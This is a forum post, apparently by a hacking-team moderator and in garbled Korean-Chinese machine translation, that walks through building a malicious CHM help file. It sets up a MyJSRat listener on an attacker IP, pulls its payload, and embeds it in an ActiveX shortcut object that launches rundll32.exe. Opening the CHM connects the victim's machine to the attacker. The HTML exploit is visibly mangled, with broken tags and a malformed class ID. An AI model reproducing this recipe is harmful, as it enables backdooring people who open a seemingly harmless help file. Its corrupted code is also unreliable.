KoreanHackerTeam
Moderator
MyJSRat结合CHM命令执行
MyJSRat
MyJsrat는 JSBackDoor의 Python 버전입니다주소 :https://github.com/ridter/myjsrat를 다운로드하십시오
Easy CHM
CHM은 컴파일 된 도움말 매뉴얼의 약어, 즉 "컴파일 된 도움말 파일"입니다. CHM은 Microsoft의 새로운 세대 도움말 파일 형식입니다. HTML을 소스 텍스트로 사용하여 도움말 컨텐츠를 데이터베이스와 같은 양식으로 컴파일하고 저장합니다.步骤
下载 MyJSRat 并运行
1git 클론 https://github.com/ridter/myjsrat
1
Python myjsrat.py -i iPaddr -p 포트
下载 wtf 文件
브라우저 액세스 https://ipaddr
ort/wtf 및 txt 파일에 저장
将上面保存的代码写入到如下代码的 Item1 的 Value 值中
참고 : rundll32.exe 전후에 추가 할 예정입니다.1
! docType htmlhtmlHeadTitleMouseJack REPLAY/TITLEHEAD/HEADBODYCOMMAND EXEC OBJECT ID=X CLASSID='CLSID33333:ADB880A6-D8FF-11CF-11CF-11CF-9377-00AAA003B71'width=1 height=1 Param Name='명령'value ''ShortCut 'PARAM BULTER' value='bitmap:3360shortcut'param name='item1'value=', rundll32.exe,'param name='initem2'value='273,1'/객체 scriptx.click ();/script/body/html
保存为 HTML 文件
새 디렉토리를 만들고 새 폴더에 위의 코드를 저장通过 EasyCHM 制作 CHM 文件
Easychm을 통해 Exp.html 파일을 컴파일합니다
双击上线
현재 Test.chm 파일을 두 번 클릭하면 온라인으로 이동할 수 있습니다.